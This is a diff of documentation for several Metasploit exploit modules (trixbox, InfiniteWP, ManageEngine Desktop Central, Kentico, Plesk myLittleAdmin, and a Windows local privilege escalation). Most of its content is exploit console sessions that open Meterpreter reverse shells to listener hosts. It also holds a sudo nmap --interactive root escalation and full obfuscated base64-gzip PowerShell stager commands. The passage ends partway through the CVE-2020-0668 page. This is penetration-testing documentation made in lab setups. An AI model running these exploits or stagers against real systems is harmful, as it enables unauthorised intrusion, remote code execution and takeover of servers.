+msf5 exploit(unix/webapp/trixbox_ce_endpoint_devicemap_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.205.1:4444 
+[*] 192.168.205.148:80 - Authenticating using "maint:password" credentials...
+[+] 192.168.205.148:80 - Authenticated successfully.
+[+] 192.168.205.148:80 - Trixbox CE v1.2.0 identified.
+[*] 192.168.205.148:80 - Sending payload (150 bytes)...
+[*] Sending stage (980808 bytes) to 192.168.205.148
+[*] Meterpreter session 1 opened (192.168.205.1:4444 -> 192.168.205.148:32775) at 2020-05-04 12:53:23 -0500
+[*] Command Stager progress - 100.00% done (799/799 bytes)
+
+meterpreter > sysinfo
+Computer     : asterisk1.local
+OS           : CentOS 4.4 (Linux 2.6.9-42.0.2.EL)
+Architecture : i686
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > shell
+Process 5678 created.
+Channel 1 created.
+id
+uid=100(asterisk) gid=101(asterisk) groups=101(asterisk)
+whoami
+asterisk
+```
+
+## Privilege Elevation Steps
+
+  Once a shell has been gained as the `asterisk` user, 
+  attackers can elevate their privileges to `root` by 
+  executing the following commands:
+
+```
+sudo nmap --interactive
+
+Starting Nmap V. 4.76 ( http://nmap.org )
+Welcome to Interactive Mode -- press h <enter> for help
+nmap> !sh
+id
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+```
+

documentation/modules/exploit/unix/webapp/wp_infinitewp_auth_bypass.md

@@ -22,33 +22,31 @@ API change. Tested against 4.8.3.
 2. Download <https://downloads.wordpress.org/plugin/iwp-client.1.9.4.4.zip>
 3. Follow <https://wordpress.org/plugins/iwp-client/#installation>
 
-### Targets
-
-```
-Id  Name
---  ----
-0   InfiniteWP Client < 1.9.4.5
-```
-
 ## Verification Steps
 
 Follow [Setup](#setup) and [Scenarios](#scenarios).
 
+## Targets
+
+### 0
+
+This targets InfiniteWP Client versions < 1.9.4.5.
+
 ## Options
 
-**USERNAME**
+### USERNAME
 
 Set this to a known, valid administrator username. Authentication will
 be bypassed for this user.
 
-**PLUGIN_FILE**
+### PLUGIN_FILE
 
 Set this to a plugin file to insert the payload into, relative to the
 plugins directory, which is normally `/wp-content/plugins`. The file
 must exist and be writable by the web user. It will be overwritten and
 later restored.
 
-**VerifyContents**
+### VerifyContents
 
 Verify that the restored contents of `PLUGIN_FILE` match the original.
 This is the default setting.
@@ -59,13 +57,20 @@ This is the default setting.
 
 ```
 msf5 > use exploit/unix/webapp/wp_infinitewp_auth_bypass
-msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > show missing
+msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > options
 
 Module options (exploit/unix/webapp/wp_infinitewp_auth_bypass):
 
-   Name    Current Setting  Required  Description
-   ----    ---------------  --------  -----------
-   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   Name         Current Setting  Required  Description
+   ----         ---------------  --------  -----------
+   PLUGIN_FILE  index.php        yes       Plugin file to edit
+   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT        80               yes       The target port (TCP)
+   SSL          false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI    /                yes       The base path to the wordpress application
+   USERNAME     admin            yes       WordPress username
+   VHOST                         no        HTTP server virtual host
 
 
 Payload options (php/meterpreter/reverse_tcp):
@@ -73,6 +78,15 @@ Payload options (php/meterpreter/reverse_tcp):
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   InfiniteWP Client < 1.9.4.5
+
 
 msf5 exploit(unix/webapp/wp_infinitewp_auth_bypass) > set rhosts 127.0.0.1
 rhosts => 127.0.0.1

documentation/modules/exploit/windows/http/desktopcentral_deserialization.md

@@ -6,33 +6,39 @@ This module exploits a Java deserialization vulnerability in the
 `getChartImage()` method from the `FileStorage` class within ManageEngine
 Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.
 
+Quoting the vendor's advisory on fixed versions:
+
 > The short-term fix for the arbitrary file upload vulnerability was
-> released in build 10.0.474 on January 20, 2020. In continuation of that,
-> the complete fix for the remote code execution vulnerability is now
-> available in build 10.0.479.
+> released in build 10.0.474 on January 20, 2020. In continuation of
+> that, the complete fix for the remote code execution vulnerability is
+> now available in build 10.0.479.
 
 ### Setup
 
 1. Download a vulnerable installer (I used 10.0.465 x64)
 2. Install the software in Windows (I used Windows 10)
 
-### Targets
-
-```
-Id  Name
---  ----
-0   Windows Command
-1   Windows Dropper
-2   PowerShell Stager
-```
-
 ## Verification Steps
 
 Follow [Setup](#setup) and [Scenarios](#scenarios).
 
+## Targets
+
+### 0
+
+This executes a Windows command.
+
+### 1
+
+This uses a Windows dropper to execute code.
+
+### 2
+
+This uses a PowerShell stager to execute code.
+
 ## Options
 
-**WfsDelay**
+### WfsDelay
 
 If the target is slow to shell, increase this value. The default is 60
 seconds, on a fresh install and calibrated to my test environment.
@@ -45,20 +51,39 @@ seconds, on a fresh install and calibrated to my test environment.
 msf5 > use exploit/windows/http/desktopcentral_deserialization
 msf5 exploit(windows/http/desktopcentral_deserialization) > set payload windows/x64/meterpreter/reverse_tcp
 payload => windows/x64/meterpreter/reverse_tcp
-msf5 exploit(windows/http/desktopcentral_deserialization) > show missing
+msf5 exploit(windows/http/desktopcentral_deserialization) > options
 
 Module options (exploit/windows/http/desktopcentral_deserialization):
 
-   Name    Current Setting  Required  Description
-   ----    ---------------  --------  -----------
-   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8383             yes       The target port (TCP)
+   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
 
 
 Payload options (windows/x64/meterpreter/reverse_tcp):
 
-   Name   Current Setting  Required  Description
-   ----   ---------------  --------  -----------
-   LHOST                   yes       The listen address (an interface may be specified)
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST                      yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   PowerShell Stager
+
 
 msf5 exploit(windows/http/desktopcentral_deserialization) > set rhosts 172.16.249.139
 rhosts => 172.16.249.139
@@ -68,8 +93,7 @@ msf5 exploit(windows/http/desktopcentral_deserialization) > run
 
 [*] Started reverse TCP handler on 172.16.249.1:4444
 [*] Executing automatic check (disable AutoCheck to override)
-[*] Detected Desktop Central version 100465
-[+] The target appears to be vulnerable. 100465 is an exploitable version
+[+] The target appears to be vulnerable. Desktop Central 100465 is a vulnerable build.
 [*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_tcp
 [*] Powershell command length: 2502
 [*] Serializing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAImual4CA7VWa2+bSBT9nEj5D6iyBCiOjV0nTSNV2gFDjGu7psSP2GutCAww8QAuDLFJt/9979iQptt0t11pERLzuM9zz8zFz2OXkSQWEuuy/Ub4fHJ8NHZSJxKk2pr6al4XarkiHx3Beu1+aAbCO0Faos2mm0QOiVdXV1qepjhmh3njGjOUZTi6owRnkiz8KcxCnOKzD3f32GXCZ6H2R+OaJncOLcUKzXFDLJyh2ON7g8R1eDgNe0MJk8Tffxfl5Vlr1dA/5Q7NJNEuMoajhkepKAtfZO7wpthgSRwSN02yxGeNGYlftxuTOHN8PAJrD3iIWZh4mShDFvCmmOVpLOzz4QYO25IIw3GauMjzUpxlYl1YctPL1eo3aVn6/ZjHjES4YcYMp8nGxukDcXHW6DmxR/FH7K9Ay2YpiYOVLIPYQ7LGUi3OKa0Lv2JGGuFthdrPKknPlUBqzFK5DoV8Ic9h4uUUHzTFFwI9FF+G50AAQO7LyfHJsV/RxX2rec/ZAqOj5X6MITppnGRkL/dOUOrCEPw4LEkLmNZu0hzLqydshVrkTOs/Vm9VslyyVzzC0nKaEG8FKmU9a87FoMvXf8zLLvZJjLtF7ETEragnvQQy9inep9ioxEYQlCSWG9jrYooDh3HYeK2/U9Mjwp501ZxQD6fIhUJlEBXUUP42mEMlJNGMhzgCiA5zIF/NB8LjSrokeVF553MQEjXqZFldGOdw4ty6YGOHYq8uoDgj5RbKWbIfil/DHeaUEdfJWGVuJVc4lv60JM5YmrtQNcj9xt5glziUQ1EXesTDamGToPIrvgiE5lAK5wAsPUAhYIUDYDPOhRRC5HWXGzZmZrShOAKR/ck3qBPAOS/JvueOE2BP/HuAFZkPzOVQVBg8Cw/qa9OE1YUpSRlcIBxWTqL/5P3ZzbGPQ0txWQipOh5LtWCc1LUd4nwsMdkjkDLI3kiTSHUyfNE53BHSq6ZOuufjbvKI4NGNj9ZUtSfThTn0+tQ2mX2rk8EkDE3SMgOYFxM9GDNl8/7mpte3uz2Udnehj8zM1HtqYbVU5PbIm2lfnUxAj2gD635nIk+Ngnlwq23NcTg3wZE2CMwAvqoZuqqyUAJVMbSBrYY6UVBgWz2r01qYzUuqkkfbtFFv9uTvyY/e6fTmuxs0GvZRaHzwjFbb2Ouvuf5ifT3o6vu5y+fWbaYTHfzoxq01DfFsulFnurGwphszON0G1nTQ7BihCusm2Q02dhOeVqv/EHuPQ3r5OIRwremiT/DCDHARIAsh+zam9t1WQ6rhpmr3HE2MCaytb8x4Z91thl5x22u+nQ4J3iTI0hEyKJzHCDnbbrM1S95b03Nroiu7YqLstvp9c6uT/nZdfifXFxdB0++Mm1PbjHtOqEK8Rb+zJv1T2AP6KLd+c8rx6+px8zGeU2estRJ612xNSPeNqpoE90dDl35SIWewcW7dJVrbDX2IyQwurWCexG1nDXZnAYLoID+os983QUfNKVlPTufcVn+rRP2dwuOM+pcQW7uMAbHYnDchPtTr2lp8bZvztocNtXnqvnvFGQuUrRV09IyKP+ohQyfNQocCRaE5VJeCkaRGed+PE8I1JOnwm7DGaYwpdFnow9XZQpQmLu83+9YAve7QgXhDnMDwdfvFkSw8Ccpf+1C1dHW1gDDhtO5QY4DjgIV1ZfdaUaCnKLuOAjn+fGJasikkMFTnHYnDcjBL92Zlfnpr6eye/M9glZdGCB/v38D6uvYPuz8FoFLfJ/zd6rcLvwTnr6c+cwgDURvuPYoPXfdlBEpmPPst4YWByvvlw/8rP+TsbAR/KyfHfwHyG93zwwoAAA==''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"

documentation/modules/exploit/windows/http/exchange_ecp_viewstate.md

@@ -3,7 +3,7 @@
 This module exploits a .NET serialization vulnerability in the Exchange Control
 Panel (ECP) web page. The vulnerability is due to Microsoft Exchange Server not
 randomizing the keys on a per-installation basis resulting in them using the
-same validationKey and decryptionKey values. With knowledge of these, values an
+same validationKey and decryptionKey values. With knowledge of these values, an
 attacker can craft a special viewstate to cause an OS command to be executed by
 NT_AUTHORITY\SYSTEM using .NET deserialization.
 

documentation/modules/exploit/windows/http/kentico_staging_syncserver.md

@@ -0,0 +1,107 @@
+## Vulnerable Application
+
+[Kentico CMS](www.kentico.com) CMS platform versions 12.0.14 and earlier are
+affected by an unauthenticated deserialization vulnerability in the Staging
+Service which can be leveraged by an attacker to execute arbitrary commands in
+the context of the target server process (usually either `NT AUTHORITY\NETWORK
+SERVICE` or `NT AUTHORITY\SYSTEM`). The vulnerability is triggered
+by sending a HTTP POST request to the SyncServer.asmx interface
+`ProcessSynchronizationTaskData` method `stagingTaskData` parameter request path
+in HTTP GET requests sent to the built-in web server. This module has been
+tested successfully on Windows 10 using exec and adduser payloads against
+Kentico v11.
+
+The vulnerable application is available for download at:
+
+  * https://d82ujmuzqhypi.cloudfront.net/Kentico_11_0_trial.exe
+  * https://d82ujmuzqhypi.cloudfront.net/Kentico_12_0_trial.exe
+  * https://www.kentico.com/download-demo
+
+## Verification Steps
+  1. Install a vulnerable Kentico CMS Trial version.
+  2. Access web instance admin interface at /admin/
+  3. Default credentials are 'administrator' with blank password.
+  4. Navigate to `Settings`, then expand `Settings` > `Versioning & Synchronization` > `Staging`
+  5. Check `Enable Staging Service` and click `Save`
+  6. Start `msfconsole`
+  7. Do `use exploit/windows/http/kentico_staging_syncserver`
+  8. Do `set RHOSTS ip` (Trial is limited to 127.0.0.1 remote HTTP clients, but paid versions are public websites)
+  9. Do `set RPORT port` (installs with a random port within IISExpress for at least Trial versions)
+  10. Do `check`
+  11. Verify the target is detected
+  12. Do `set PAYLOAD cmd/windows/generic`
+  13. Do `set CMD calc`
+  14. Do `exploit`
+  15. Verify `calc.exe` launches. 
+
+## Scenarios
+
+### Kentico CMS v11.0 trial on Windows 7 SP 1 x64
+
+```
+msf5 exploit(windows/http/kentico_staging_syncserver) > show options 
+
+Module options (exploit/windows/http/kentico_staging_syncserver):
+
+   Name       Current Setting                              Required  Description
+   ----       ---------------                              --------  -----------
+   Proxies                                                 no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.159.31                               yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      80                                           yes       The target port (TCP)
+   SRVHOST    0.0.0.0                                      yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080                                         yes       The local port to listen on.
+   SSL        false                                        no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                                                 no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /Kentico11/CMSPages/Staging/SyncServer.asmx  yes       Path to SyncServer.asmx
+   URIPATH                                                 no        The URI to use for this exploit (default is random)
+   VHOST      localhost                                    no        HTTP server virtual host
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Windows EXE Dropper
+
+
+msf5 exploit(windows/http/kentico_staging_syncserver) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Command Stager progress -  24.99% done (2999/12002 bytes)
+[*] Command Stager progress -  49.98% done (5998/12002 bytes)
+[*] Command Stager progress -  74.96% done (8997/12002 bytes)
+[*] Sending stage (201283 bytes) to 192.168.159.31
+[*] Command Stager progress -  99.83% done (11982/12002 bytes)
+[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.31:51599) at 2020-05-04 09:51:29 -0400
+[*] Command Stager progress - 100.00% done (12002/12002 bytes)
+
+meterpreter > sysinfo
+Computer        : WIN-9NSI4A6AIHJ
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > getuid
+Server username: NT AUTHORITY\NETWORK SERVICE
+meterpreter >
+```
+
+## Notes
+
+  1. The IISExpress config is located in ~/Documents/IISExpress/config/applicationhost.config
+  2. Port number can be changed or allow remote access by replacing 'localhost' with '*'
+  3. To run IIS on command line, C:\PROGRA~1\IIS Express\iisexpress.exe /site:Kentico11 (etc)
+  4. It might be possible to use a CmdStager or FileDropper but couldn't get it working in time. Might be a string limit and has issues with Unicode.
+  5. Some reverse or bind payloads work if the environment is right.
+  6. Other serialized injections are possible with `ysoserial.exe -f SoapFormatter` but untested.

documentation/modules/exploit/windows/http/plesk_mylittleadmin_viewstate.md

@@ -0,0 +1,122 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a ViewState .NET deserialization vulnerability in
+web-based MS SQL Server management tool myLittleAdmin, for version 3.8
+and likely older versions, due to hardcoded `<machineKey>` parameters in
+the `web.config` file for ASP.NET.
+
+Popular web hosting control panel Plesk offers myLittleAdmin as an
+optional component that is selected automatically during "full"
+installation. This exploit caters to the Plesk target, though it
+should work fine against a standalone myLittleAdmin setup.
+
+Successful exploitation results in code execution as the user running
+myLittleAdmin, which is `IUSRPLESK_sqladmin` for Plesk and described as
+the "SQL Admin MSSQL anonymous account."
+
+Tested on the latest Plesk Obsidian with optional myLittleAdmin 3.8.
+
+### Setup
+
+Follow Plesk's [official
+instructions](https://docs.plesk.com/en-US/obsidian/deployment-guide/76450/),
+making sure to select the "Obsidian" release and the `Full` installation
+option. This will get you myLittleAdmin. Alternatively, you may select
+the myLittleAdmin component manually.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This executes a Windows command.
+
+### 1
+
+This uses a Windows dropper to execute code.
+
+### 2
+
+This uses a PowerShell stager to execute code.
+
+## Options
+
+### RPORT
+
+You may need to change `RPORT` to where myLittleAdmin is running. It is
+set to port **8401** by default for Plesk installations.
+
+## Scenarios
+
+### myLittleAdmin 3.8 on Plesk Obsidian on Windows Server 2016
+
+```
+msf5 > use exploit/windows/http/plesk_mylittleadmin_viewstate
+msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > options
+
+Module options (exploit/windows/http/plesk_mylittleadmin_viewstate):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      8401             yes       The myLittleAdmin port (default for Plesk!) (TCP)
+   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI  /                yes       Base path
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST                      yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   PowerShell Stager
+
+
+msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > set rhosts 172.16.249.169
+rhosts => 172.16.249.169
+msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > set lhost 172.16.249.1
+lhost => 172.16.249.1
+msf5 exploit(windows/http/plesk_mylittleadmin_viewstate) > run
+
+[*] Started reverse TCP handler on 172.16.249.1:4444
+[*] Executing automatic check (disable AutoCheck to override)
+[+] myLittleAdmin is running at https://172.16.249.169:8401/
+[+] The target is vulnerable. We can sign our own ViewState.
+[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_tcp
+[*] Powershell command length: 2498
+[*] Serializing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAFwAx14CA7VWbW+bSBD+nEj5D6iyZFAcG6dOm0aqdIAhxrUTE/zuWicMa9h4YQkssUmv//1mbUhTNb1rTzqExO7svD4zs8M6i1yGaSTkK0X4cnJ8NHASJxTEShbXhIp3d3sjHR0BueLNRsJHQVwocdymoYOj5dWVliUJithhX79GTElTFK4IRqkoCX8JkwAl6Ox2dY9cJnwRKn/WrwldOaRgyzXHDZBwpkQeP+tR1+Gu1O2YYCZWP3+uSouz5rKuP2QOScWqnacMhXWPkKokfJW4wWEeI7Hax25CU7pm9QmO3p7XR1HqrNENaHtEfcQC6qVVCYKAN0EsSyKBh8PlD6diFZaDhLqK5yUoTas1YcE1L5bLP8RFYfYuixgOUd2MGEpobKPkEbsorXecyCPoDq2XIGWzBEf+UpKA7ZFukFiJMkJqwu+oEW/QtgTtV4XEl0LANWCJVIMs/hhmn3oZQQfB6it+QuIleMrkA2xfT45PjtdlndDp5GWdwOposV8jcE0c0BTv2T4Kck3ogxWH0SSHbWWYZEhaPgMrVFAwpNvazxU0S27gfVhlQFmMKfaWIFEks0I/cerPS7KN1jhC7TxyQuyWVSe+BjBaE7QPsF6y3YBHYrU4QF4bEeQ7jGPG8/yDmB5i9iyrZph4KFFcSFIKXkH+pO+dOaRBrJpRH4WA0GEPhVdZQ62jkruo77y0zvfAVNWIk6Y1YZBBs7k1wUYOQV5NUKIUF0dKxuh+Wf3mbj8jDLtOykp1S+mAYmFNo1HKksyFlEHkQztGLnYIB6ImdLCH1NzGfmm1+ioMmkMIdABoeoQ0AIWHbzNeCAk4eEi6VLcRM8OYoBCY9k1vEMeHFi8KfV86jo+86vcOlnV8KFoORInAC/cguzahrCaMccLg5uCgQv38R+Mv7gxwQ0tQkQWx7IyFmjNe0JWHD08Tg9djgcoeg4RB/EZCQ9VJ0bvW4X4Q3zR03L4YtOmTAo9u3Flj1R6N52bf6xLbZPZMx71REJi4afqwz0e6P2By/Gk47HTtdkdJ2rtgrZipqXfU3GqqitvB78dddTQCOaz1rPudqXhq6E/9mbY1B8HUBENazzd9+Kpm4KryXPZV2dB6throWFZ82+pYrebcbFwSFT/Zpq10Js/2nu3orVZnuhsqN/2uEhi3ntE8N/byGy4/31z32vp+7/K9NUt1rIMd3ZhZ4wBNxrE60Y25NY5N/3TrW+Neo2UEKtBNvOvFdgOeZrP7GHlPfXL51Ad3rfG8i9Hc9FHuK5ai2LOI2KutpqiGm6jtC2VkjIC2GZrRzlrFfS+fdRofxn2MYqpYuqIYBPoxVJxtu9Gc0E/W+MIa6fIuH8m7rX7f2Oq4u90U39H1u3d+Y90aNMa2GXWcQAV/825rg7uncBY6Y3m2bow5fm09ajxFU+IMtCYlq0ZzhNvvVdXEqHvTd8mDCjGDjgtrRbVzN1iDT6Z/aflTGp07G9A78RXwDuKDPK+7JsioGcGb0emU6+pu5bC7k7mfYfcSfDsvfFBYZE4b4J/SadtadG2b03MPGWrj1P34hpcs1GwltLbBi1r82QDpO0kaOARqFEZDeSsYNDGK635AMZcQRf57sEFJhAjMV5jAZXMphFCXjxo+F2DKHWYPH4UjWL49f3UlCc+M0rcRVJKurubgI29a3lD1Hop8FtTk3VtZhpki71oyBPnrgWk0zsWDrhofSntonrWTvXaJN3Il1m69/xWz4vYI4OP9C2bfaP9w+ks4yrVDxD+Qvyf8Fqa/G/jEwQwYbbj7CDpM3lfjL8rjxW8Jzwnkfl08/K/yNmNnN/C3cnL8NwbBQmG9CgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
+[+] Successfully executed command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIAFwAx14CA7VWbW+bSBD+nEj5D6iyZFAcG6dOm0aqdIAhxrUTE/zuWicMa9h4YQkssUmv//1mbUhTNb1rTzqExO7svD4zs8M6i1yGaSTkK0X4cnJ8NHASJxTEShbXhIp3d3sjHR0BueLNRsJHQVwocdymoYOj5dWVliUJithhX79GTElTFK4IRqkoCX8JkwAl6Ox2dY9cJnwRKn/WrwldOaRgyzXHDZBwpkQeP+tR1+Gu1O2YYCZWP3+uSouz5rKuP2QOScWqnacMhXWPkKokfJW4wWEeI7Hax25CU7pm9QmO3p7XR1HqrNENaHtEfcQC6qVVCYKAN0EsSyKBh8PlD6diFZaDhLqK5yUoTas1YcE1L5bLP8RFYfYuixgOUd2MGEpobKPkEbsorXecyCPoDq2XIGWzBEf+UpKA7ZFukFiJMkJqwu+oEW/QtgTtV4XEl0LANWCJVIMs/hhmn3oZQQfB6it+QuIleMrkA2xfT45PjtdlndDp5GWdwOposV8jcE0c0BTv2T4Kck3ogxWH0SSHbWWYZEhaPgMrVFAwpNvazxU0S27gfVhlQFmMKfaWIFEks0I/cerPS7KN1jhC7TxyQuyWVSe+BjBaE7QPsF6y3YBHYrU4QF4bEeQ7jGPG8/yDmB5i9iyrZph4KFFcSFIKXkH+pO+dOaRBrJpRH4WA0GEPhVdZQ62jkruo77y0zvfAVNWIk6Y1YZBBs7k1wUYOQV5NUKIUF0dKxuh+Wf3mbj8jDLtOykp1S+mAYmFNo1HKksyFlEHkQztGLnYIB6ImdLCH1NzGfmm1+ioMmkMIdABoeoQ0AIWHbzNeCAk4eEi6VLcRM8OYoBCY9k1vEMeHFi8KfV86jo+86vcOlnV8KFoORInAC/cguzahrCaMccLg5uCgQv38R+Mv7gxwQ0tQkQWx7IyFmjNe0JWHD08Tg9djgcoeg4RB/EZCQ9VJ0bvW4X4Q3zR03L4YtOmTAo9u3Flj1R6N52bf6xLbZPZMx71REJi4afqwz0e6P2By/Gk47HTtdkdJ2rtgrZipqXfU3GqqitvB78dddTQCOaz1rPudqXhq6E/9mbY1B8HUBENazzd9+Kpm4KryXPZV2dB6throWFZ82+pYrebcbFwSFT/Zpq10Js/2nu3orVZnuhsqN/2uEhi3ntE8N/byGy4/31z32vp+7/K9NUt1rIMd3ZhZ4wBNxrE60Y25NY5N/3TrW+Neo2UEKtBNvOvFdgOeZrP7GHlPfXL51Ad3rfG8i9Hc9FHuK5ai2LOI2KutpqiGm6jtC2VkjIC2GZrRzlrFfS+fdRofxn2MYqpYuqIYBPoxVJxtu9Gc0E/W+MIa6fIuH8m7rX7f2Oq4u90U39H1u3d+Y90aNMa2GXWcQAV/825rg7uncBY6Y3m2bow5fm09ajxFU+IMtCYlq0ZzhNvvVdXEqHvTd8mDCjGDjgtrRbVzN1iDT6Z/aflTGp07G9A78RXwDuKDPK+7JsioGcGb0emU6+pu5bC7k7mfYfcSfDsvfFBYZE4b4J/SadtadG2b03MPGWrj1P34hpcs1GwltLbBi1r82QDpO0kaOARqFEZDeSsYNDGK635AMZcQRf57sEFJhAjMV5jAZXMphFCXjxo+F2DKHWYPH4UjWL49f3UlCc+M0rcRVJKurubgI29a3lD1Hop8FtTk3VtZhpki71oyBPnrgWk0zsWDrhofSntonrWTvXaJN3Il1m69/xWz4vYI4OP9C2bfaP9w+ks4yrVDxD+Qvyf8Fqa/G/jEwQwYbbj7CDpM3lfjL8rjxW8Jzwnkfl08/K/yNmNnN/C3cnL8NwbBQmG9CgAA''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
+[*] Sending stage (201283 bytes) to 172.16.249.169
+[*] Meterpreter session 1 opened (172.16.249.1:4444 -> 172.16.249.169:57257) at 2020-05-21 17:27:42 -0500
+
+meterpreter > getuid
+Server username: WIN-NANLB47E6I4\IUSRPLESK_sqladmin
+meterpreter > sysinfo
+Computer        : WIN-NANLB47E6I4
+OS              : Windows 2016+ (10.0 Build 14393).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 4
+Meterpreter     : x64/windows
+meterpreter >
+```

documentation/modules/exploit/windows/local/cve_2020_0668_service_tracing.md

@@ -0,0 +1,224 @@
+## Vulnerable Application
+
+Windows 10 x64 build versions 17134-18363
+
+On builds prior to 17134, the file copy takes place, but it copies the
+logfile rather than the payload.  it is possible that tweaking the
+MaxSize registry value will affect this, but I found not value that
+worked.
+
+### Introduction
+
+This module makes changes to the filesystem that cannot be removed
+without Administrative access and a reboot happens.  Specifically, the
+payload C:\windows\system32\WindowsCoreDeviceInfo.dll will be held open
+by the RasMan Service until a reboot.  That also rpevents removal of the
+directories (if any) that were created. I was not able to stop the
+service without a reboot to allow file removal.
+
+This module crashes occasionally when writing to
+HKLM\SOFTWARE\Microsoft\Tracing\RASTAPI.  If that happens, you cannot
+re-run the module, as there will be a name collision for the symlinks
+required.  It might be nice to add a way to clean that up, as it
